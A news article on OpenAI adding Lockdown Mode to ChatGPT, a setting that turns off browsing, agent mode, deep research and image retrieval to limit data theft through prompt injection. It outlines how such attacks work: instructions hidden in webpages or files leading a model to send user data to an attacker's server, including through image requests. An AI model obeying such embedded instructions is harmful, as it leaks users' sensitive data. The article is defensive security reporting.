OpenAI has introduced Lockdown Mode to ChatGPT to prevent data theft resulting from prompt injection attacks.

OpenAI has introduced Lockdown Mode to ChatGPT to prevent data theft resulting from prompt injection attacks.

      OpenAI has started to implement a new security feature called Lockdown Mode for ChatGPT, aimed at preventing data theft through prompt injection attacks. This setting disables live web browsing, agent mode, deep research, image retrieval, Canvas networking, and file downloads. It is accessible to all logged-in users, including those on Free, Go, Plus, Pro, and self-serve ChatGPT Business plans.

      Prompt injection continues to be a significant challenge for all large language models. This type of attack involves embedding harmful instructions within the content processed by the model, such as webpages or uploaded files. If the model executes those instructions, it could unintentionally send sensitive information to an attacker’s server.

      While Lockdown Mode is effective at severing the pathways that attackers use to exfiltrate data, it does not prevent injections entirely. Malicious payloads embedded in cached web pages or uploaded PDFs can still affect the model’s behavior. The mode ensures that no network requests to external servers can be made, as live browsing is restricted, and image retrieval is disabled, cutting off pixel-based data channels.

      OpenAI acknowledges that Lockdown Mode significantly mitigates the risk of data loss through prompt injection, but it cannot guarantee complete protection. Risks may still exist through enabled apps, unforeseen combinations of capabilities, or new techniques that may emerge.

      However, the implementation of Lockdown Mode comes with considerable trade-offs. When enabled, ChatGPT loses many of its useful features, such as live browsing, which becomes limited to cached content, and the entire agent mode is removed. Deep research is also unavailable, making it clear that, as OpenAI notes, this mode is “not intended for everyone.”

      This feature is introduced amid growing concerns around prompt injection attacks on AI agents. Security researchers have demonstrated vulnerabilities in agents from companies like Anthropic, Google, and Microsoft through their GitHub Actions integrations. Although all three offered bug bounties, they did not issue public advisories. The core issue lies in the fundamental challenge that large language models struggle to differentiate between data and instructions.

      Lockdown Mode cannot be activated simultaneously with Developer Mode; turning one on disables the other. Additionally, OpenAI has introduced a separate session management tool that allows users to review active ChatGPT sessions and log out of specific devices if they suspect unauthorized access.

      This feature reflects a practical acknowledgment by OpenAI that while it has not resolved the prompt injection issue, it is providing users with a way to minimize risks by sacrificing certain functionalities. For individuals working with sensitive data in ChatGPT, this trade-off may be justified. However, for others, the expanding ecosystem and increasing vulnerabilities heighten the risk.

Other articles

Trump signs a memorandum placing the 'most advanced AI' under military control and prohibiting vendors from shutting it down. Trump signs a memorandum placing the 'most advanced AI' under military control and prohibiting vendors from shutting it down. Trump's recent security memorandum speeds up the implementation of military AI, mandates an update to the autonomous weapons directive, and prohibits companies from deactivating deployed models. Kyle Vogt's Bot Company is facing a lawsuit for converting an Airbnb into a robot laboratory. Kyle Vogt's Bot Company is facing a lawsuit for converting an Airbnb into a robot laboratory. The Bot Company reportedly rented a house in San Francisco under deceitful circumstances and utilized it as a research and development lab for domestic robots. The homeowner is seeking $12,000 in damages. Trump signs a memorandum that places 'the most advanced AI' under military control and prohibits suppliers from withdrawing support. Trump signs a memorandum that places 'the most advanced AI' under military control and prohibits suppliers from withdrawing support. Trump's latest security memo speeds up the implementation of military AI, directs an update for autonomous weapons guidelines, and prohibits companies from deactivating deployed models. Kyle Vogt's Bot Company is facing a lawsuit for converting an Airbnb into a robotics laboratory. Kyle Vogt's Bot Company is facing a lawsuit for converting an Airbnb into a robotics laboratory. The Bot Company is accused of reserving a home in San Francisco under misleading circumstances and utilizing it as a research and development lab for home robots. The property owner is suing for $12,000. Google's updated AI response system may simplify the texting experience. Google's updated AI response system may simplify the texting experience. Google Messages is said to be trialing a new feature called “tap to draft,” which utilizes AI to create longer and more contextually relevant text responses within conversations. OpenAI introduces Lockdown Mode in ChatGPT to prevent data theft resulting from prompt injection attacks. OpenAI introduces Lockdown Mode in ChatGPT to prevent data theft resulting from prompt injection attacks. ChatGPT's new Lockdown Mode turns off live browsing, agent mode, and deep research to prevent attackers from extracting data via prompt injection.

OpenAI has introduced Lockdown Mode to ChatGPT to prevent data theft resulting from prompt injection attacks.

ChatGPT's new Lockdown Mode turns off live browsing, agent mode, and deep research to prevent attackers from extracting data via prompt injection.